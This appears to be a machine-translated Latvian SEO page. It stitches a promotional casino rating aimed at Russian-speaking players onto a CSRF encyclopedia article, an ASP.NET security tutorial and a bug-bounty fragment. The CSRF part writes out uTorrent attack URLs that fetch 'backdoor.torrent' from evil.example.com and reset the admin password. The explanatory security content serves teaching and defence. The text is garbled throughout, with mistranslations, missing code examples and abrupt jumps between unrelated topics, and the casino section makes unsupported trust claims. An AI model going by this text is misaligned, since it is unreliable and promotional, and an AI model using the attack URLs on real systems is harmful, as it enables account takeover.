Kas ir csrf vērtība. Kas ir CSRF? Termina CSRF nozīme

Uzticamu un godīgu tiešsaistes kazino atrašana prasa daudz brīva laika, it īpaši, ja runa ir par iesācējiem. Ir jānovērtē spēļu kluba caurspīdīgums, tā reputācija tīklā, citu lietotāju atsauksmes, maksājumu ātrums un daudzi citi darbības faktori. Lai glābtu spēlētājus no šī likteņa, mēs esam apkopojuši kazino reitings , kas ir rūpīgi pārbaudīti un apstiprinājuši savu godīgumu un labu atdevi spēļu automātos.

Mūsu labāko kazino reitings

Jums vairs nav jātērē personīgais laiks, pārbaudot iestādes uzticamību. Pieredzējuši azartspēļu analītiķi, kuri katru mēnesi pavada desmitiem stundu kazino, ir veikuši savu objektīvu azartspēļu klubu darba novērtējumu. Viņi analizēja simtiem iestāžu, lai galu galā piedāvātu lietotājiem labākās platformas internetā.

Sākotnējais klubu saraksts bija diezgan liels, taču analīzes laikā apšaubāmas un neuzticamas iestādes pazuda. Piemēram, viltotas licences esamība, slotu sertifikātu trūkums, servera aizstāšana spēļu automātā un daudz kas cits kalpo kā brīdinājums ekspertiem. Pat viens faktors, kas ļauj šaubīties par kazino godīgumu, ir iemesls izslēgšanai no vērtējuma.

Papildus virspusējai azartspēļu platformu analīzei tiek pārbaudīta informācija par iestādēm internetā. Analīzē tiek ņemta vērā tiešsaistes reputācija, pašreizējo un bijušo spēlētāju atsauksmes, konfliktsituāciju klātbūtne, skandāli ar kazino un veidotāju problēmu risināšanas veidi. Īpaša uzmanība tiek pievērsta jauniešu klubiem ar darba pieredzi līdz 1-2 gadiem.

Kā tiek sastādīts kazino reitings un kas tur nokļūst?

Par radīšanu Licencētu kazino reitingsmēs piesaistām pieredzējušus spēlētājus un analītiķus ar vairāk nekā 10 gadu pieredzi nozarē. Pateicoties savām zināšanām, viņi var viegli atsijāt krāpnieciskos klubus un pēc tam veikt rūpīgu atlikušo uzņēmumu analīzi. Rezultāts ir neliels saraksts ar uzticamiem kazino, kuros varat droši spēlēt, nebaidoties par rezultātu un izmaksu godīgumu.

  • azartspēļu regulatora licences un izvēlētās reģistrācijas jurisdikcijas esamība;
  • platformas drošība, kas garantē datu un maksājumu informācijas konfidencialitāti;
  • licencētas programmatūras izvēle no uzticamiem pakalpojumu sniedzējiem, kuru darbā nav iespējams iejaukties;
  • krievu valodas versijas pieejamība lielākai lietotāju ērtībām no Krievijas un NVS valstīm;
  • atbalsta dienests, tai skaitā tā darba grafiks, atbildes ātrums, problēmu risināšanas kvalitāte;
  • naudas izņemšana bez papildu kavējumiem vai pārbaudēm, kā arī naudas saņemšanas iespējas un darījumu apstrādes ātrums;
  • bonusu programmas jauniem un pastāvīgajiem lietotājiem, turnīru klātbūtne, loterijas, periodiskas akcijas;
  • maksājumu sistēmas, kas ietekmē klientu ērtības papildināt kontu un izņemt laimestus.

Šis ir tikai neliels saraksts ar attiecīgajām prasībām, kuras izvērtē eksperti. Katrs kritērijs saņem savu svarīguma koeficientu, kas tiek ņemts vērā, summējot gala rezultātu.

Kas ir licencēts kazino?

Kazino reitings , kas apliecina azartspēļu platformu darba godīgumu un caurspīdīgumu, var sastāvēt tikai no iestādēm, kurām ir derīgas darbības licences. Juridiskajiem klubiem ir jāiziet normatīvie auditi un jāievēro visi noteikumi, lai saņemtu apstiprinājumu.

Nepietiek tikai ar licences pieminēšanu vietnē. Eksperti saprot, ka krāpnieki var izmantot logotipus, lai maldinātu naivos lietotājus, tāpēc viņi neatkarīgi analizē informāciju. Lai to izdarītu, dodieties uz regulatora oficiālo vietni un apstipriniet informāciju, izmantojot dokumenta numuru vai juridiskās personas nosaukumu. Ja nav informācijas par licenci, tas ir viltojums.

Analītiķi izmanto arī tehnisko analīzi, lai pārbaudītu licencētu programmatūru. Izmantojot izstrādātāju rīkus, viņi iegūst piekļuvi informācijai par datu pārsūtīšanas serveri. Ja kazino izmanto programmatūras nodrošinātāja oficiālo portālu, programmatūra ir godīga un likumīga. Tas nozīmē, ka jūs nevarat iejaukties viņa darbā un pielāgot gala rezultātus.

Kā tiek noteikts kazino godīgums?

Ir diezgan grūti patstāvīgi novērtēt spēļu kluba godīgumu, kas saistīts ar pieejamo resursu un zināšanu apjomu. Pirms iestāžu iekļaušanasgodīgs kazino vērtējums, analītiķi rūpīgi pārbauda daudzus faktorus:

  • reģioni, no kuriem tiek ņemti spēlētāji, jo aizliegtās jurisdikcijas runā daudz;
  • izņemšanas limitus, ierobežojot vienreizējos darījumus, kā arī ikdienas, nedēļas un mēneša darījumu apjomu;
  • informācijas pieejamība par KYC un AML, kas liecina par atbilstību tiesību aktu prasībām par naudas izcelsmes godīgumu un likumību;
  • reputācija, kas apliecina kluba godīgumu un uzticamību, kā arī skaļu skandālu vai problēmu neesamību;
  • darba ilgums, kas ļauj pilnībā novērtēt tiešsaistes resursa vēsturi, ieskaitot visas priekšrocības un trūkumus;
  • regulatora klātbūtne un tā noteikumu ievērošana, kas palielina darbības godīguma iespējas.

Licence un regulators ir diezgan svarīgi kritēriji, taču tas nenodrošina 100% godīguma garantiju. Uz šādu titulu var rēķināties tikai tie klubi, kas spēlētājiem ļāva iegūt lielus laimestus un džekpotus, dāvināja dāvanas loterijām un turnīriem.

Spēļu automātu šķirnes

Spēļu automātu un citu azartspēļu izklaides veidu skaits daudz pasaka par iestādi. Daži klubi sadarbojas tikai ar dažiem programmatūras nodrošinātājiem, bet saņem no tiem populārus un jaunus spēļu piedāvājumus, savukārt citi paplašina sadarbības līgumu tīklu un aicina uz sadarbību milzīgu skaitu zīmolu. Jo vairāk spēļu platformā tiek prezentēti automāti, jo vieglāk klientam ir izvēlēties sev tīkamo slotu.

Bet Licencētu kazino reitingsņem vērā ne tikai spēļu daudzveidību, bet arī to kvalitāti. Uzticamas azartspēļu iestādes izmanto tikai licencētu programmatūru, kuras godīgums un drošība ir pārbaudīta. Šādas mašīnas ļauj rēķināties ar atdevi līdz pat 98%, un jūs nevarat traucēt viņu darbu un pielāgot rezultātu ģenerēšanas algoritmu.

Atklāti sakot, visas vietnes ir vērstas uz peļņas gūšanu. Pat ja kāds no spēlētājiem laimē džekpotu, ilgtermiņā iestāde paliek mīnusā. Bet tikai godīgi klubi ļauj lietotājiem iegūt lielu džekpotu un izņemt to uz reālu kontu. Tas atšķir licencētus tiešsaistes kazino no krāpnieciskiem projektiem.

Bonusu politika

Izveidojiet kazino reitingu tas nav iespējams, neņemot vērā bonusu politiku. Visi spēļu klubi izmanto akcijas un dāvanas, lai piesaistītu jaunus un noturētu esošos klientus. Taču dažas iestādes rīkojas diezgan viltīgi, radot slēptus nosacījumus likmēm vai uzkrājumiem, izvirzot nereālus derību nosacījumus diapazonā no x60-100, kurus izpildīt ir gandrīz neiespējami.

Standarta stimulu komplekts sastāv no šādām kategorijām:

  1. Bez depozīta bonusa jaunu klientu uzņemšanai - tiek ieskaitīta e-pasta adreses un tālruņa numura apstiprināšanai. Kā atlīdzība tiek izmantota bezmaksas nauda vai bezmaksas griezieni spēļu automātos ar obligātu derību prasību.
  2. Reģistrācijas dāvana - bezmaksas griezieni vai konta papildināšanas summas reizinātāji 1-5 iemaksām no personīgā profila izveides brīža. Precīzu bonusa apmēru un maksimālos limitus nosaka katrs klubs individuāli.
  3. Lojalitātes programma - dažādas lietotāju statusu sistēmas, kas ietekmē iknedēļas naudas atmaksas lielumu, personīgo pakalpojumu sniegšanas noteikumu pieejamību, individuālas dāvanas, izdevīgu vietējās valūtas maiņas kursu pret naudu un daudz ko citu.
  4. Reklāmas kodi ir periodiskas akcijas no azartspēļu klubiem, kas visiem izsniedz dāvanu kartes bezmaksas griezieniem, bez depozīta vai konta reizinātājiem.

Krieviski runājošie kazino

Veido 2020. gada labāko kazino reitings, tiek ņemta vērā krievu valodas klātbūtne platformā. Krievu valodas saskarne ļauj lietotājiem no Krievijas, Baltkrievijas, Ukrainas un NVS valstīm bez problēmām tikt galā ar reģistrāciju, pieteikšanos, konta papildināšanu un citām platformas funkcijām. Tas arī apliecina, ka iestāde ir orientēta uz krievvalodīgajiem lietotājiem, piedāvājot viņiem unikālus bonusus un atbalstu.

Tiek ņemts vērā atbalsta dienesta darbs. Lielākā daļa azartspēļu klubu sniedz palīdzību klientiem tikai angļu valodā, kas sarežģī komunikācijas procesu. Lai izveidotu pieprasījumu un saprastu atbalsta atbildi, jums ir jāizmanto tulks vai jāsazinās ar zinošiem cilvēkiem. Tāpēc reitingā ir iekļauti tikai tie tiešsaistes klubi, kas konsultē klientus atbalsta tērzēšanā un pa tālruni krievu valodā.

Krievu valodas interfeiss kazino ļaus ērti izprast platformas lietošanas noteikumus, izpētīt bonusu piedāvājumus un to uzkrājumu, derību iespējas, piedalīties turnīros un loterijās bez šaubām par darbību pareizību.

Ātrās naudas izņemšanas kazino

Īpaša uzmanība tiek pievērsta maksājumu ātrumam tiešsaistes kazino. Daži klubi piedāvā izņemšanu no bankas kartēm un e-makiem dažu stundu laikā, un VIP klientiem tie apstrādā pieprasījumus uzreiz. Citi izmanto manuālu pieteikumu apstrādi darba dienās pēc īpaša grafika, tāpēc maksājumi var aizkavēties līdz 1-3 darba dienām no pieteikuma datuma. Lai glābtu lietotājus no ilga gaidīšanas laika, izveidotskazino reitings ar ātru naudas izņemšanu.

To veido tikai tās institūcijas, kuras operatīvi izskata visus pieteikumus un nerada šķēršļus naudas saņemšanai. Tiek ņemts vērā ne tikai pārskaitījumu ātrums, bet arī problēmu neesamība, pieprasot lielus maksājumus vai naudas pārskaitījumus pēc džekpota, liela džekpota laimēšanas. Tikai godīgas iestādes var garantēt godīgus maksājumus un bez problēmām ar maksājumiem.

Tā arī analizē pieejamās maksājumu sistēmas noguldījumiem un naudas pieprasīšanai. Standarta vietnes atbalsta minimālu skaitu veidu, bet progresīvie klubi pastāvīgi analizē tendences, lai integrētu jaunus tehniskos risinājumus.

Galvenās maksājumu sistēmas tiešsaistes kazino:

  • bankas kartes MIR, MasterCard, Visa;
  • elektroniskie maki QIWI, Yandex, Webmoney, Neteller, Skrill un citi;
  • mobilie maksājumi Beeline, MegaFon, MTS, TELE2;
  • Krievijas internetbanka;
  • populāras kriptovalūtas, tostarp Bitcoin, Ethereum, Litecoin.

Klientu atbalsta dienests

Svarīgs faktors, kas tika ņemts vērā, lai izveidotugodīgs kazino vērtējums- klientu atbalsta pieejamība un tā darba kvalitāte. Uzticamas iestādes pašas rūpējas par savu klientu bāzi, tāpēc organizē īpašas telefona līnijas, kā arī tiešsaistes čatus, lai operatīvi atbildētu uz lietotāju jautājumiem un atrisinātu viņu problēmas.

Analītiķi izmantoja tālruņa līnijas, tiešsaistes tērzēšanu un e-pasta kontaktpersonas, lai analizētu atbalstu. Vietnes darbinieki dažādos diennakts laikos saņēma dažādus jautājumus vai lūgumus risināt tehniskās problēmas. Pēc tam tika novērtēta viņu darba kvalitāte, kas ietvēra šādus faktorus:

  • atbildes sniegšanas ātrums;
  • vai konsultants risina problēmu un cik ilgi tas prasīja;
  • atbilžu pratība un krievvalodīgo darbinieku pieejamība atbalstam.

Ja kazino nav krieviski runājošu operatoru, mēs iesakām izmantot Google tiešsaistes tulkotāju, lai tulkotu konsultantu jautājumus un atbildes.

secinājumus

Pirms reģistrēšanās tiešsaistes klubā ir jāanalizē tā darba uzticamība, caurspīdīgums, kā arī jāpārbauda reputācija un atsauksmes tīklā. Tā vietā mēs iesakām izmantotgodīgs kazino vērtējumssastādījuši pieredzējuši spēlmaņi. Izmantojot savu pieredzi, viņi noraidīja desmitiem aizdomīgu azartspēļu klubu, atstājot 2020. gada labāko iestāžu sarakstu sarakstā.

Vairāku vietņu viltošanas pieprasījums zināms arī kā uzbrukums ar vienu klikšķi vai braukšanas sesija un saīsināti CSRF(dažreiz izrunā paisuma urbums) vai XSRF, ir ļaunprātīgas programmatūras veids, kas tiek izmantots no vietnes, kurā tiek sūtītas nesankcionētas komandas no lietotāja, kuram tīmekļa lietojumprogramma uzticas. Ir daudz veidu, kā ļaunprātīga vietne var pārsūtīt šādas komandas; Piemēram, īpaši izstrādāti attēlu tagi, slēptās formas un JavaScript XMLHttpRequests var darboties bez lietotāja mijiedarbības vai pat zināšanām. Atšķirībā no starpvietņu skriptēšanas (XSS), kas izmanto lietotāja uzticēšanos konkrētai vietnei, CSRF izmanto vietnes uzticību lietotāja pārlūkprogrammai.

vēsture

CSRF ievainojamības ir zināmas un dažos gadījumos ir izmantotas kopš 2001. gada. Tā kā tas tiek pārsūtīts no lietotāja IP adreses, dažiem vietņu žurnāliem var nebūt CSRF pierādījuma. Vismaz publiski netiek ziņots par ļaunprātīgām darbībām, un 2007. gadā bija vairāki labi dokumentēti piemēri:

  • Netflix vietnē 2006. gadā bija daudzas CSRF ievainojamības, kas ļāva uzbrucējam veikt tādas darbības kā DVD pievienošana upura nomas rindai, piegādes adreses maiņa kontā vai upura pieteikšanās akreditācijas datu maiņa, lai pilnībā apdraudētu kontu.
  • Tiešsaistes banku tīmekļa lietojumprogramma ING Direct bija neaizsargāta pret CSRF uzbrukumiem, kas ļāva veikt nelikumīgus naudas pārskaitījumus.
  • Populārā video vietne YouTube arī 2008. gadā bija neaizsargāta pret CSRF, un tas ļāva jebkuram uzbrucējam veikt praktiski visas jebkura lietotāja darbības.
  • McAfee ir arī neaizsargāts pret CSRF, ļaujot uzbrucējiem mainīt uzņēmuma sistēmu.

2018. gadā tika veikti jauni uzbrukumi tīmekļa ierīcēm, tostarp mēģinājumi mainīt maršrutētāju DNS iestatījumus. Vairāki maršrutētāju ražotāji steigā izlaida programmaparatūras atjauninājumu, lai uzlabotu drošību, un ieteica lietotājam mainīt maršrutētāja iestatījumus, lai samazinātu risku. Sīkāka informācija netiek izpausta, atsaucoties uz "acīmredzamiem drošības apsvērumiem".

Piemērs un īpašības

Uzbrucēji, kuri var atrast reproducējamu saiti, kas veic noteiktu darbību galvenajā lapā, kamēr upuris reģistrējas, var iegult šādu saiti savā kontrolētajā lapā un pievilināt upuri to atvērt. Uzbrukuma nesēja saiti var ievietot vietā, kuru upuris, visticamāk, apmeklēs, ieejot mērķa vietnē (piemēram, foruma diskusijā), vai nosūtīt HTML e-pasta ziņojumā vai pielikumā. Reālā Utorrent CSRF ievainojamība (CVE-2008-6586) izmantoja faktu, ka tā tīmekļa konsole ir pieejama vietējā resursdatorā: 8080 ļāva veikt kritiskas darbības ar vienkāršu GET pieprasījumu:

Piespiedu .torrent faila lejupielāde http: // local: 8080 / GUI / action = add url & s = http: //evil.example.com/backdoor.torrent Mainīt Utorrent administratora paroli http: // local: 8080 / gui / action = setsetting & s = webui.password & v = eviladmin

Uzbrukumi tika uzsākti, forumos ievietojot ļaunprātīgus, automātiskus HTML attēla elementus un surogātpasta vēstules, lai pārlūkprogrammas, kas apmeklē šīs lapas, tās automātiski atvērtu bez īpašas lietotāja darbības. Cilvēki, kas izmanto neaizsargāto Utorrent versiju, vienlaikus atverot šīs lapas, ir bijuši neaizsargāti pret uzbrukumu.

CSRF uzbrukumi, izmantojot attēlu tagus, bieži tiek veikti no tiešsaistes forumiem, kur lietotāji var ievietot attēlus, bet ne JavaScript, piemēram, izmantojot BBCode:

Http: // localhost: 8080 / gui /? Darbība = add-url & s = http: //evil.example.com/backdoor.torrent

Piekļūstot uzbrukuma saitei vietējai Utorrent lietojumprogrammai uz localhost: 8080, pārlūkprogramma vienmēr automātiski nosūtīs arī visus šī domēna esošos sīkfailus. Šis tīmekļa pārlūkprogrammu kopīgais īpašums ļauj CSRF uzbrukumiem izmantot mērķtiecīgās ievainojamības un veikt naidīgas darbības, ja vien lietotājs uzbrukuma brīdī ir pieteicies mērķa vietnē (šajā piemērā vietējā Utorrent tīmekļa saskarnē).

Vairāku vietņu viltošanas pieprasījums ir neskaidrs starpniekservera uzbrukums tīmekļa pārlūkprogrammai.

CSRF parasti ir šādas īpašības:

  • Tas ietver vietnes, kas paļaujas uz lietotāja identitāti.
  • Tas izmanto vietnes uzticību šai identitātei.
  • Tas apmāna lietotāja pārlūkprogrammu, lai sūtītu HTTP pieprasījumus mērķa vietnei.
  • Tas ietver HTTP pieprasījumus, kuriem ir blakusparādības.

HTTP darbības vārdi un CSRF

  • HTTP GET CSRF izmantošana ir triviāla, izmantojot iepriekš aprakstītās metodes, piemēram, vienkāršu hipersaiti, kas satur manipulētus parametrus un tiek automātiski ielādēta, izmantojot IMG tagu. Tomēr saskaņā ar HTTP specifikāciju GET ir jāizmanto kā droša metode, tas ir, būtiski nemainot lietotāja stāvokli lietojumprogrammā. Lietojumprogrammām, kas šādām darbībām izmanto GET, ir jāpārslēdzas uz HTTP POST vai jāizmanto CSRF aizsardzība.
  • HTTP POST ir dažādas CSRF ievainojamības atkarībā no detalizētajiem lietošanas scenārijiem:
    • Vienkāršākajā formā POST ar datiem, kas kodēti kā vaicājuma virkne (lauks1 = vērtība1 & lauks2 = vērtība2). CSRF uzbrukumi ir viegli īstenojami, izmantojot vienkāršu HTML veidlapu, un ir jāpiemēro pretCSRF pasākumi.
    • Ja dati tiek nosūtīti jebkurā citā formātā (JSON, XML), standarta metode ir izsniegt POST pieprasījumu, izmantojot XMLHttpRequest ar CSRF uzbrukumiem, ko novērš SOP un; ir metode patvaļīga satura iesniegšanai no vienkāršas HTML formas, izmantojot atribūtu ENCTYPE; šādu viltus pieprasījumu var atšķirt no likumīgiem pēc teksta / vienkārša satura veida, bet, ja tas netiek izpildīts serverī, var veikt CSRF
  • citas HTTP metodes (PUT, DELETE utt.) var izsniegt tikai izmantojot XMLHttpRequest ar SOP un CSRF novēršanu; Tomēr šie pasākumi nebūs aktīvi vietnēs, kas tos skaidri atspējo, izmantojot galveni Access-Control-Allow-Origin: *

Citas pieejas CSRF

Turklāt, lai gan CSRF parasti tiek raksturots kā statisks uzbrukuma veids, to var arī dinamiski izveidot kā daļu no lietderīgās slodzes starpvietņu uzbrukuma scenārijiem, kā to parāda Samy tārps, vai izveidot lidojuma laikā, izmantojot sesijas informāciju, kas noplūda, izmantojot ārpusi. vietnes saturs un tiek nosūtīts uz mērķi kā ļaunprātīgs URL. CSRF marķierus var nosūtīt arī uzbrucējs klients sesijas fiksācijas vai citu ievainojamību dēļ, vai arī tos var uzminēt brutāla spēka uzbrukumā, kas pārvēršas par ļaunprātīgu lapu, kas ģenerē tūkstošiem neveiksmīgu pieprasījumu. "Dinamiskā CSRF" uzbrukuma klasi jeb katra klienta lietderīgās slodzes izmantošanu konkrētai krāpšanās sesijai 2009. gadā BlackHat instruktāžā aprakstīja Neitans Hamiels un Šons Moijers, lai gan taksonomija vēl ir jāpiemēro plašāk.

Orens Ofers OWASP nodaļas vietējā sanāksmē 2012. gada janvārī prezentēja jaunu vektoru dinamisku CSRF uzbrukumu izstrādei - "AJAX Hammer - Dynamic CSRF".

Efekti

Ir publicēti CSRF ievainojamību smaguma rādītāji, kas noved pie attālinātas koda izpildes ar superlietotāja privilēģijām, kā arī ievainojamību, kas varētu apdraudēt saknes sertifikātu, kas pilnībā iedragātu publiskās atslēgas infrastruktūru.

Ierobežojumi

Lai starpvietņu viltošanas pieprasījums būtu veiksmīgs, ir jānotiek dažām lietām:

  1. Uzbrucējam ir jāatlasa vietne, kas nepārbauda novirzītāja galveni, vai upuris, izmantojot pārlūkprogrammu, vai spraudnis, kas pieļauj novirzītāju viltošanu.
  2. Uzbrucējam mērķa vietnē ir jāatrod iesniegšanas veidlapa vai vietrādis URL, kam ir blakusparādības, veicot kādu darbību (piemēram, pārskaitot naudu vai mainot upura e-pasta adresi vai paroli).
  3. Uzbrucējam ir jānosaka visu formu vai URL ievades pareizās vērtības; ja kādai no tām ir jābūt slepenām autentifikācijas vērtībām vai identifikatoriem, kurus uzbrucējs nevarēs uzminēt, visticamāk, uzbrukums to nevarēs (ja vien uzbrucējam nav ļoti paveicies tos uzminēt).
  4. Uzbrucējam ir jāievilina upuris tīmekļa lapā ar ļaunprātīgu kodu, kamēr upuris reģistrējas mērķa vietnē.

Uzbrukums ir akls: uzbrucējs nevar redzēt, ko mērķa vietne sūta atpakaļ upurim, atbildot uz viltotiem pieprasījumiem, ja vien viņš neizmanto starpvietņu skriptēšanu vai citu kļūdu mērķa vietnē. Turklāt uzbrucējs var mērķēt uz jebkuru saiti vai iesniegt veidlapas, kas nāk pēc sākotnējā viltotā pieprasījuma tikai tad, ja šīs turpmākās saites vai veidlapas ir līdzīgi paredzamas. (Vairākus mērķus var modelēt, iekļaujot lapā vairākus attēlus vai izmantojot JavaScript, lai ieviestu aizkavi starp klikšķiem.)

Ņemot vērā šos ierobežojumus, uzbrucējam var rasties grūtības atrast upura anonīmo vai neaizsargāto iesniegumu. No otras puses, uzbrukuma mēģinājumi ir viegli saliekami un upuriem neredzami, un lietojumprogrammu izstrādātāji ir mazāk pazīstami un sagatavoti CS uzbrukumiem nekā, piemēram, paroļu uzlaušanai no vārdnīcu uzbrukumiem.

profilakse

Lielākā daļa CSRF novēršanas metožu darbojas, pieprasījumos ievadot papildu autentifikācijas datus, ļaujot tīmekļa lietojumprogrammai noteikt pieprasījumus no nesankcionētām vietām.

Sinhronizatora marķiera modelis

  • Kad esat pieteicies, tīmekļa lietojumprogramma iestata sīkfailu, kas satur nejaušu marķieri, kas paliek nemainīgs visas lietotāja sesijas laikā.
Iestatīt sīkfailu: Csrf-token = i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; beidzas = ceturtdiena, 2015. gada 23. jūlijs, 10:25:33 GMT; Maksimālais vecums = 31449600; Ceļš = /
  • JavaScript darbojas klienta pusē, nolasa vērtību un kopē to pielāgotajā HTTP galvenē, kas tiek nosūtīta ar katru darījuma pieprasījumu.
X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
  • Serveris pārbauda marķieru esamību un integritāti

Šīs metodes drošība ir balstīta uz pieņēmumu, ka tikai JavaScript, kas darbojas vienā un tajā pašā avotā, varēs nolasīt sīkfaila nozīmi. JavaScript darbojas ar negodīgu failu vai e-pastu, to nevarēs nolasīt un kopēt pielāgotā galvenē. Pat ja CSRF marķieris cepumi tiks automātiski nosūtīts no negodīgā pieprasījuma, serveris joprojām gaidīs derīgu X-CSRF marķieri virsraksts .

Pašam CSRF marķierim ir jābūt unikālam un neparedzamam. To var ģenerēt nejauši vai to var iegūt no sesijas marķieriem, izmantojot HMAC:

Csrf_token = HMAC (session_token, application_secret)

CS sīkfailu marķierim nevajadzētu būt HTTPOnly karogam, jo ​​tas ir paredzēts lasīšanai, izmantojot JavaScript dizainu.

Šo paņēmienu ievieš daudzi mūsdienīgi ietvari, piemēram, Django un AngularJS. Tā kā marķieris paliek nemainīgs visas lietotāja sesijas laikā, tas labi darbojas ar AJAX lietojumprogrammām, taču nenodrošina notikumu secību tīmekļa lietojumprogrammās.

Šīs metodes nodrošinātā aizsardzība var tikt apdraudēta, ja mērķa vietne atvienojas tās pašas izcelsmes politiku, izmantojot vienu no šīm metodēm:

  • Atļautā piekļuve-kontrole-atļaut-izcelsmes galvene (ar argumenta zvaigznīti)
  • fails clientaccesspolicy.xml, kas nodrošina neparedzētu piekļuvi Silverlight vadīklai
  • crossdomain.xml failu, kas nodrošina neparedzētu piekļuvi flash filmām

Dubultsūtīšanas sīkfails

Līdzīgi kā metode no sīkfaila uz galvenes, taču bez JavaScript iesaistīšanas vietne var iestatīt CSRF pilnvaru kā sīkfailu, kā arī ievietot to slēptā laukā katrā klienta nosūtītajā HTML veidlapā. Kad veidlapa ir iesniegta, vietne var pārbaudīt, vai sīkfailu marķieris atbilst marķieru formai. Vispārējā izcelsmes politika neļauj uzbrucējam lasīt vai iestatīt sīkfailus mērķa domēnā, tāpēc viņi nevar nodrošināt pareizo marķieri savā ģenerētajā formā.

Šīs metodes priekšrocība salīdzinājumā ar sinhronizācijas modeli ir tāda, ka marķieris nav jāglabā serverī.

Klientu garantijas

Pārlūka paplašinājumi, piemēram, RequestPolicy (programmai Mozilla Firefox) vai Umatrix (gan Firefox, gan Google Chrome/Chromium), var novērst CSRF, nodrošinot noklusējuma atteikuma politiku starpvietņu pieprasījumiem. Tomēr tas var būtiski traucēt daudzu vietņu normālu darbību. CsFire paplašinājums (arī Firefox) var mazināt CSRF ietekmi, mazāk ietekmējot parasto pārlūkošanu, noņemot autentifikācijas informāciju no starpvietņu pieprasījumiem.

ASP.NET MVC nav vispopulārākais, taču diezgan populārs steks tīmekļa izstrādātāju vidū. No (pret) hakeru viedokļa tā standarta funkcionalitāte sniedz jums zināmu pamata drošību, taču ir nepieciešama papildu aizsardzība, lai aizsargātos pret lielāko daļu hakeru triku. Šajā rakstā mēs apskatīsim pamatinformāciju, kas ASP.NET izstrādātājam (vai tas būtu Core, MVC, MVC Razor vai Web Forms) jāzina par drošību.

Sāksim ar visiem zināmajiem uzbrukumu veidiem.

SQL injekcija

Savādi, bet 2017. gadā injekcija un jo īpaši SQL injekcija ir pirmajā vietā starp "10 OWASP drošības riskiem" (Open Web Application Security Project). Šāda veida uzbrukums nozīmē, ka lietotāja ievadītie dati tiek izmantoti servera pusē kā vaicājuma parametri.

Klasiskās SQL injekcijas piemērs ir raksturīgāks Web Forms lietojumprogrammām. Parametru kā vaicājuma vērtību izmantošana palīdz aizsargāt pret uzbrukumiem:

String commandText = "UPDATE Users SET Status = 1 WHERE CustomerID = @ID;"; SqlCommand komanda = new SqlCommand (commandText, connectionString); komanda.Parametri ["@ ID"]. Vērtība = klienta ID;

Ja izstrādājat MVC lietojumprogrammu, Entity Framework aptver dažas ievainojamības. Lai iegūtu SQL injekciju, kas darbojas MVC/EF lietojumprogrammā, jums ir jāizdomā. Tomēr tas ir iespējams, ja izpildāt SQL, izmantojot ExecuteQuery vai izsaucat slikti uzrakstītas saglabātās procedūras.

Lai gan ORM izvairās no SQL injekcijas (izņemot iepriekš minētos piemērus), ir ieteicams ierobežot atribūtus līdz vērtībām, kuras var iegūt modeļa lauki un līdz ar to arī forma. Piemēram, ja tiek pieņemts, ka laukā var ievadīt tikai tekstu, izmantojiet Regex, lai norādītu diapazonu ^ + $. Un, ja laukā ir jāievada cipari, norādiet to kā prasību:

Publiskā virkne Zip (get; set;)

Programmā Web Forms varat ierobežot vērtības, izmantojot pārbaudītājus. Piemērs:

Kopš .NET 4.5 Web Forms izmanto neuzkrītošu validāciju. Tas nozīmē, ka jums nav jāraksta papildu kods, lai apstiprinātu veidlapas vērtību.

Jo īpaši datu validācija var palīdzēt aizsargāt pret citu labi zināmu ievainojamību, ko sauc par starpvietņu skriptēšanu (XSS).

XSS

Tipisks XSS piemērs ir skripta pievienošana komentāram vai viesu grāmatas ierakstam. Tas var izskatīties šādi:

Kā jūs saprotat, šajā piemērā sīkfaili no jūsu vietnes tiek pārsūtīti kā parametrs kādam hakeru resursam.

Programmā Web Forms varat kļūdīties ar kodu, piemēram:

atvainojos<%= username %>bet parole ir nepareiza

Ir skaidrs, ka lietotājvārda vietā var būt skripts. Lai izvairītos no skripta izpildes, varat vismaz izmantot citu ASP.NET izteiksmi: kas kodē tā saturu.

Ja izmantojam Razor, virknes tiek kodētas automātiski, kas samazina XSS ieviešanas iespējamību – hakeris to varēs izvilkt tikai tad, ja pieļausi rupju kļūdu, piemēram, izmanto @ Html.Raw (Model.username) vai savā modelī izmantojiet MvcHtmlString, nevis virkni.

Lai nodrošinātu papildu aizsardzību pret XSS, dati tiek kodēti arī C # kodā. Programmā NET Core varat izmantot šādus kodētājus no System.Text.Encodings.Web nosaukumvietas: HtmlEncoder, JavaScriptEncoder un UrlEncoder.

Nākamajā piemērā tiks atgriezta virkne 6 7 8

Būtībā, kad upuris ielādēja lapu, viņi iesniedza pieprasījumu Badoo skriptam, paņēma šī lietotāja parametru rt un pēc tam veica pieprasījumu upura vārdā. Šajā gadījumā tā bija Mahmuda konta saistīšana ar upura kontu, kas ļāva pilnībā pārņemt kontu.

secinājumus

Kur ir dūmi, tur ir uguns.Šeit Mahmuds pamanīja, ka rt parametrs tika atgriezts dažādās vietās, konkrētās json atbildēs. Tāpēc viņš pareizi pieņēma, ka tas varētu tikt parādīts kaut kur, kur to šajā gadījumā varētu izmantot js failā.

Rezultāti

CSRF uzbrukumi ir vēl viens bīstams uzbrukumu vektors, un tos var veikt bez aktīvas upura darbības vai pat bez viņa brīdinājuma. CSRF ievainojamību atrašana prasa zināmu atjautību un atkal gatavību visu pārbaudīt.

Parasti veidlapas pēc noklusējuma tiek aizsargātas ar tādiem ietvariem kā Rails, ja vietne veic POST pieprasījumu, taču API var

būt atsevišķs stāsts. Piemēram, Shopify galvenokārt ir rakstīts, pamatojoties uz Ruby on Rails ietvaru, kas pēc noklusējuma nodrošina CSRF aizsardzību visām formām (lai gan to var atspējot). Tomēr ir skaidrs, ka tas ne vienmēr attiecas uz API, kas izveidotas, izmantojot šo sistēmu. Visbeidzot, pievērsiet uzmanību zvaniem, kas maina datus serverī (piemēram, dzēšanas darbībai) un tiek veikti, izmantojot GET pieprasījumu.